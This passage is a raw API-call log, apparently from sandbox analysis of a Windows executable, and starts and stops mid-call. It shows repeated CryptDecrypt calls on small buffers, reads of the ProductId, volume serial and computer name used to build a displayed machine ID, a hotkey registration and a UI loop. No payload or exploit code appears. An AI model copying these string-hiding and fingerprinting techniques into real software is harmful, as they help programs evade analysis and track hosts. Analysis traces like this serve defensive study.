phKey=0x534bdc*=0x536e98) returned 1 [0055.460] CryptDecrypt (in: hKey=0x536e98, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5373c0, pdwDataLen=0x18ff48 | out: pbData=0x5373c0, pdwDataLen=0x18ff48) returned 1 [0055.460] CryptDestroyKey (hKey=0x536e98) returned 1 [0055.460] GetProcessHeap () returned 0x520000 [0055.460] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537680 [0055.460] GetProcessHeap () returned 0x520000 [0055.460] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x536338 [0055.460] GetProcessHeap () returned 0x520000 [0055.460] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537690 [0055.460] GetProcessHeap () returned 0x520000 [0055.460] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x536350 [0055.460] GetProcessHeap () returned 0x520000 [0055.460] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5376a0 [0055.460] GetProcessHeap () returned 0x520000 [0055.460] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x14) returned 0x536e98 [0055.460] GetProcessHeap () returned 0x520000 [0055.460] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5376b0 [0055.460] GetProcessHeap () returned 0x520000 [0055.460] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x16) returned 0x536eb8 [0055.460] GetProcessHeap () returned 0x520000 [0055.460] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5376c0 [0055.460] GetProcessHeap () returned 0x520000 [0055.460] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x534020 [0055.460] GetProcessHeap () returned 0x520000 [0055.460] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5376d0 [0055.460] GetProcessHeap () returned 0x520000 [0055.460] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x22) returned 0x5374e8 [0055.460] GetProcessHeap () returned 0x520000 [0055.460] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5376e0 [0055.460] GetProcessHeap () returned 0x520000 [0055.460] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5376f0 [0055.460] GetProcessHeap () returned 0x520000 [0055.460] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537700 [0055.460] GetProcessHeap () returned 0x520000 [0055.461] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1a) returned 0x534070 [0055.461] GetProcessHeap () returned 0x520000 [0055.461] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537710 [0055.461] GetProcessHeap () returned 0x520000 [0055.461] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x536368 [0055.461] GetProcessHeap () returned 0x520000 [0055.461] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537720 [0055.461] GetProcessHeap () returned 0x520000 [0055.461] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x536380 [0055.461] GetProcessHeap () returned 0x520000 [0055.461] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537730 [0055.461] GetProcessHeap () returned 0x520000 [0055.461] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x536398 [0055.461] GetProcessHeap () returned 0x520000 [0055.461] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537740 [0055.461] GetProcessHeap () returned 0x520000 [0055.461] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537750 [0055.461] GetProcessHeap () returned 0x520000 [0055.461] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537760 [0055.461] GetProcessHeap () returned 0x520000 [0055.461] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x5363b0 [0055.461] GetProcessHeap () returned 0x520000 [0055.461] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537770 [0055.461] GetProcessHeap () returned 0x520000 [0055.461] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537780 [0055.461] GetProcessHeap () returned 0x520000 [0055.461] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537790 [0055.461] GetProcessHeap () returned 0x520000 [0055.461] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5363c8 [0055.461] GetProcessHeap () returned 0x520000 [0055.461] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5377a0 [0055.461] GetProcessHeap () returned 0x520000 [0055.461] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5363e0 [0055.461] GetProcessHeap () returned 0x520000 [0055.462] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5377b0 [0055.462] GetProcessHeap () returned 0x520000 [0055.462] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5377c0 [0055.462] GetProcessHeap () returned 0x520000 [0055.462] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5377d0 [0055.462] GetProcessHeap () returned 0x520000 [0055.462] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5377e0 [0055.462] GetProcessHeap () returned 0x520000 [0055.462] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5377f0 [0055.462] GetProcessHeap () returned 0x520000 [0055.462] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537800 [0055.462] GetProcessHeap () returned 0x520000 [0055.462] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5373c0 | out: hHeap=0x520000) returned 1 [0055.462] GetProcessHeap () returned 0x520000 [0055.462] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x24) returned 0x537518 [0055.462] GetProcessHeap () returned 0x520000 [0055.462] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x537810 [0055.462] GetProcessHeap () returned 0x520000 [0055.462] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x60) returned 0x5373c0 [0055.462] CryptImportKey (in: hProv=0x534c10, pbData=0x18fee0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x537428) returned 1 [0055.462] CryptDecrypt (in: hKey=0x537428, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5373c0, pdwDataLen=0x18ff48 | out: pbData=0x5373c0, pdwDataLen=0x18ff48) returned 1 [0055.462] CryptDestroyKey (hKey=0x537428) returned 1 [0055.463] GetProcessHeap () returned 0x520000 [0055.463] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5363f8 [0055.463] GetProcessHeap () returned 0x520000 [0055.463] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x536410 [0055.463] GetProcessHeap () returned 0x520000 [0055.463] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x536428 [0055.463] GetProcessHeap () returned 0x520000 [0055.463] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x14) returned 0x537548 [0055.463] GetProcessHeap () returned 0x520000 [0055.463] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1a) returned 0x5340c0 [0055.463] GetProcessHeap () returned 0x520000 [0055.463] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5373c0 | out: hHeap=0x520000) returned 1 [0055.463] GetShellWindow () returned 0x100f2 [0055.463] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x41ba68 | out: lpdwProcessId=0x41ba68) returned 0x458 [0055.464] GetProcessHeap () returned 0x520000 [0055.464] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x537980 [0055.464] CryptImportKey (in: hProv=0x534c10, pbData=0x18fee0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x5373c0) returned 1 [0055.464] CryptDecrypt (in: hKey=0x5373c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x537980, pdwDataLen=0x18ff48 | out: pbData=0x537980, pdwDataLen=0x18ff48) returned 1 [0055.464] CryptDestroyKey (hKey=0x5373c0) returned 1 [0055.464] GetProcessHeap () returned 0x520000 [0055.464] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x5379a8 [0055.464] CryptImportKey (in: hProv=0x534c10, pbData=0x18fee0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x5373c0) returned 1 [0055.464] CryptDecrypt (in: hKey=0x5373c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5379a8, pdwDataLen=0x18ff48 | out: pbData=0x5379a8, pdwDataLen=0x18ff48) returned 1 [0055.464] CryptDestroyKey (hKey=0x5373c0) returned 1 [0055.464] GetProcessHeap () returned 0x520000 [0055.464] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x5379d0 [0055.464] CryptImportKey (in: hProv=0x534c10, pbData=0x18fee0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x5373c0) returned 1 [0055.464] CryptDecrypt (in: hKey=0x5373c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5379d0, pdwDataLen=0x18ff48 | out: pbData=0x5379d0, pdwDataLen=0x18ff48) returned 1 [0055.464] CryptDestroyKey (hKey=0x5373c0) returned 1 [0055.464] GetProcessHeap () returned 0x520000 [0055.464] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x5379f8 [0055.464] CryptImportKey (in: hProv=0x534c10, pbData=0x18fcb8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x5373c0) returned 1 [0055.464] CryptDecrypt (in: hKey=0x5373c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5379f8, pdwDataLen=0x18fd24 | out: pbData=0x5379f8, pdwDataLen=0x18fd24) returned 1 [0055.464] CryptDestroyKey (hKey=0x5373c0) returned 1 [0055.465] GetProcessHeap () returned 0x520000 [0055.465] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x60) returned 0x5373c0 [0055.465] CryptImportKey (in: hProv=0x534c10, pbData=0x18fcb8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x537428) returned 1 [0055.465] CryptDecrypt (in: hKey=0x537428, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5373c0, pdwDataLen=0x18fd24 | out: pbData=0x5373c0, pdwDataLen=0x18fd24) returned 1 [0055.465] CryptDestroyKey (hKey=0x537428) returned 1 [0055.465] GetEnvironmentVariableW (in: lpName="SystemDrive", lpBuffer=0x18fd28, nSize=0x104 | out: lpBuffer="C:") returned 0x2 [0055.465] GetProcessHeap () returned 0x520000 [0055.465] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5379f8 | out: hHeap=0x520000) returned 1 [0055.465] GetProcessHeap () returned 0x520000 [0055.465] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x5379f8 [0055.465] CryptImportKey (in: hProv=0x534c10, pbData=0x18fcb8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x537428) returned 1 [0055.465] CryptDecrypt (in: hKey=0x537428, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5379f8, pdwDataLen=0x18fd24 | out: pbData=0x5379f8, pdwDataLen=0x18fd24) returned 1 [0055.465] CryptDestroyKey (hKey=0x537428) returned 1 [0055.465] GetProcessHeap () returned 0x520000 [0055.465] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x60) returned 0x537428 [0055.465] CryptImportKey (in: hProv=0x534c10, pbData=0x18fcb8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x537490) returned 1 [0055.465] CryptDecrypt (in: hKey=0x537490, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x537428, pdwDataLen=0x18fd24 | out: pbData=0x537428, pdwDataLen=0x18fd24) returned 1 [0055.465] CryptDestroyKey (hKey=0x537490) returned 1 [0055.466] GetEnvironmentVariableW (in: lpName="SystemDrive", lpBuffer=0x18fd28, nSize=0x104 | out: lpBuffer="C:") returned 0x2 [0055.466] GetProcessHeap () returned 0x520000 [0055.466] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5379f8 | out: hHeap=0x520000) returned 1 [0055.466] GetProcessHeap () returned 0x520000 [0055.466] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1e) returned 0x5379f8 [0055.466] GetProcessHeap () returned 0x520000 [0055.466] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x12) returned 0x536ed8 [0055.466] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0055.466] DialogBoxParamW (hInstance=0x400000, lpTemplateName=0x65, hWndParent=0x0, lpDialogFunc=0x404eb0, dwInitParam=0x0) [0059.712] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1001) returned 0x4011e [0059.712] EnableWindow (hWnd=0x4011e, bEnable=1) returned 0 [0059.712] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1003) returned 0x50114 [0059.712] EnableWindow (hWnd=0x50114, bEnable=1) returned 0 [0059.712] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1002) returned 0x50116 [0059.712] EnableWindow (hWnd=0x50116, bEnable=0) returned 0 [0059.712] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1008) returned 0x16026e [0059.712] EnableWindow (hWnd=0x16026e, bEnable=1) returned 0 [0059.712] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1010) returned 0x202a4 [0059.712] EnableWindow (hWnd=0x202a4, bEnable=1) returned 0 [0059.712] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1012) returned 0x20276 [0059.712] EnableWindow (hWnd=0x20276, bEnable=1) returned 0 [0059.712] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1009) returned 0x20274 [0059.712] EnableWindow (hWnd=0x20274, bEnable=1) returned 0 [0059.712] GetProcessHeap () returned 0x520000 [0059.712] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x535198 [0059.712] CryptImportKey (in: hProv=0x534c10, pbData=0x18fb58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x53b9f8) returned 1 [0059.713] CryptDecrypt (in: hKey=0x53b9f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x535198, pdwDataLen=0x18fbbc | out: pbData=0x535198, pdwDataLen=0x18fbbc) returned 1 [0059.713] CryptDestroyKey (hKey=0x53b9f8) returned 1 [0059.713] GetProcessHeap () returned 0x520000 [0059.713] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x537fc0 [0059.713] CryptImportKey (in: hProv=0x534c10, pbData=0x18fb58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x53b9f8) returned 1 [0059.713] CryptDecrypt (in: hKey=0x53b9f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x537fc0, pdwDataLen=0x18fbbc | out: pbData=0x537fc0, pdwDataLen=0x18fbbc) returned 1 [0059.713] CryptDestroyKey (hKey=0x53b9f8) returned 1 [0059.713] GetProcessHeap () returned 0x520000 [0059.713] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x5351e0 [0059.713] CryptImportKey (in: hProv=0x534c10, pbData=0x18f730, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x53b9f8) returned 1 [0059.713] CryptDecrypt (in: hKey=0x53b9f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5351e0, pdwDataLen=0x18f7a0 | out: pbData=0x5351e0, pdwDataLen=0x18f7a0) returned 1 [0059.713] CryptDestroyKey (hKey=0x53b9f8) returned 1 [0059.713] GetProcessHeap () returned 0x520000 [0059.713] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x537fe8 [0059.713] CryptImportKey (in: hProv=0x534c10, pbData=0x18f730, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x53b9f8) returned 1 [0059.713] CryptDecrypt (in: hKey=0x53b9f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x537fe8, pdwDataLen=0x18f7a0 | out: pbData=0x537fe8, pdwDataLen=0x18f7a0) returned 1 [0059.713] CryptDestroyKey (hKey=0x53b9f8) returned 1 [0059.713] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20119, phkResult=0x18f79c | out: phkResult=0x18f79c*=0xec) returned 0x0 [0059.713] RegQueryValueExA (in: hKey=0xec, lpValueName="ProductId", lpReserved=0x0, lpType=0x0, lpData=0x18f7a8, lpcbData=0x18f7a4*=0x400 | out: lpType=0x0, lpData=0x18f7a8*=0x30, lpcbData=0x18f7a4*=0x18) returned 0x0 [0059.714] RegCloseKey (hKey=0xec) returned 0x0 [0059.714] GetProcessHeap () returned 0x520000 [0059.714] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5351e0 | out: hHeap=0x520000) returned 1 [0059.714] GetProcessHeap () returned 0x520000 [0059.714] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x537fe8 | out: hHeap=0x520000) returned 1 [0059.714] GetProcessHeap () returned 0x520000 [0059.714] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x537fe8 [0059.714] CryptImportKey (in: hProv=0x534c10, pbData=0x18f510, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x53b9f8) returned 1 [0059.714] CryptDecrypt (in: hKey=0x53b9f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x537fe8, pdwDataLen=0x18f574 | out: pbData=0x537fe8, pdwDataLen=0x18f574) returned 1 [0059.714] CryptDestroyKey (hKey=0x53b9f8) returned 1 [0059.714] GetEnvironmentVariableW (in: lpName="SystemDrive", lpBuffer=0x18f578, nSize=0x104 | out: lpBuffer="C:") returned 0x2 [0059.714] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18f570, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18f570*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0059.714] GetProcessHeap () returned 0x520000 [0059.714] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x537fe8 | out: hHeap=0x520000) returned 1 [0059.714] wsprintfA (in: param_1=0x18f7bf, param_2="-%08X" | out: param_1="-9C354B42") returned 9 [0059.715] wsprintfW (in: param_1=0x18fbc0, param_2="%08X" | out: param_1="4B2E4630") returned 8 [0059.715] SetWindowTextW (hWnd=0x5011c, lpString="4B2E4630") returned 1 [0059.715] wsprintfW (in: param_1=0x18f3a8, param_2="1. ID: %08X\r\n2. %s\r\n" | out: param_1="1. ID: 4B2E4630\r\n2. admin\r\n") returned 27 [0059.715] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1005) returned 0x4015e [0059.716] SetWindowTextW (hWnd=0x4015e, lpString="1. ID: 4B2E4630\r\n2. admin\r\n") returned 1 [0059.840] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1005) returned 0x4015e [0059.841] SendMessageW (hWnd=0x4015e, Msg=0xc5, wParam=0x0, lParam=0x0) returned 0x1 [0059.841] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0059.841] SendMessageW (hWnd=0x80162, Msg=0xc5, wParam=0x0, lParam=0x0) returned 0x1 [0059.841] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1010) returned 0x202a4 [0059.841] SendMessageW (hWnd=0x202a4, Msg=0xf1, wParam=0x1, lParam=0x0) returned 0x0 [0059.841] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1012) returned 0x20276 [0059.841] SendMessageW (hWnd=0x20276, Msg=0xf1, wParam=0x0, lParam=0x0) returned 0x0 [0059.841] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1008) returned 0x16026e [0059.841] SendMessageW (hWnd=0x16026e, Msg=0xf1, wParam=0x1, lParam=0x0) returned 0x0 [0059.841] RegisterHotKey (hWnd=0x5011c, id=0, fsModifiers=0x3, vk=0x56) returned 1 [0059.841] GetComputerNameW (in: lpBuffer=0x18fbc0, nSize=0x18fbbc | out: lpBuffer="XDUWTFONO", nSize=0x18fbbc) returned 1 [0059.841] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1011) returned 0x202a2 [0059.841] SetWindowTextW (hWnd=0x202a2, lpString="XDUWTFONO") returned 1 [0059.842] CoInitialize (pvReserved=0x0) returned 0x0 [0062.731] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x405700, lpParameter=0x1, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x114 [0062.739] SetTimer (hWnd=0x5011c, nIDEvent=0x1, uElapse=0x32, lpTimerFunc=0x0) returned 0x1 [0062.739] SetTimer (hWnd=0x5011c, nIDEvent=0x2, uElapse=0x3a98, lpTimerFunc=0x0) returned 0x2 [0062.739] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x118 [0062.739] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1001) returned 0x4011e [0062.739] EnableWindow (hWnd=0x4011e, bEnable=0) returned 0 [0062.741] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1003) returned 0x50114 [0062.741] EnableWindow (hWnd=0x50114, bEnable=0) returned 0 [0062.743] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1002) returned 0x50116 [0062.743] EnableWindow (hWnd=0x50116, bEnable=1) returned 1 [0062.743] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1008) returned 0x16026e [0062.743] EnableWindow (hWnd=0x16026e, bEnable=0) returned 0 [0062.744] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1010) returned 0x202a4 [0062.744] EnableWindow (hWnd=0x202a4, bEnable=0) returned 0 [0062.745] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1012) returned 0x20276 [0062.745] EnableWindow (hWnd=0x20276, bEnable=0) returned 0 [0062.746] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1009) returned 0x20274 [0062.746] EnableWindow (hWnd=0x20274, bEnable=0) returned 0 [0062.798] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0062.798] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0063.843] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0063.843] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0063.890] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0063.890] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0063.952] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0063.952] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0066.513] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0066.513] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0066.573] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0066.573] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0067.300] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0067.300] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0067.353] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0067.353] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0067.753] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0067.753] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0069.388] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0069.388] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0069.428] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0069.428] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0069.521] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0069.521] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0069.849] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0069.849] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0069.911] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0069.911] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0069.976] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0069.976] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0070.037] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0070.037] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0070.101] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0070.101] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0070.161] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0070.161] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0070.223] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0070.223] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0070.286] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0070.286] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0070.349] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0070.349] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0071.930] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0071.930] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0072.267] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0072.267] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0072.329] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0072.329] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0072.392] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0072.392] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0072.454] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0072.454] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0072.516] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0072.517] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0072.580] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0072.580] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0072.657] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0072.657] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0072.721] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0072.721] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0072.782] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0072.782] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0072.845] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0072.845] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0072.907] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0072.907] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0072.974] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0072.974] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0073.032] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0073.032] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0073.094] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0073.094] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0073.161] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0073.161] SetWindowTextW 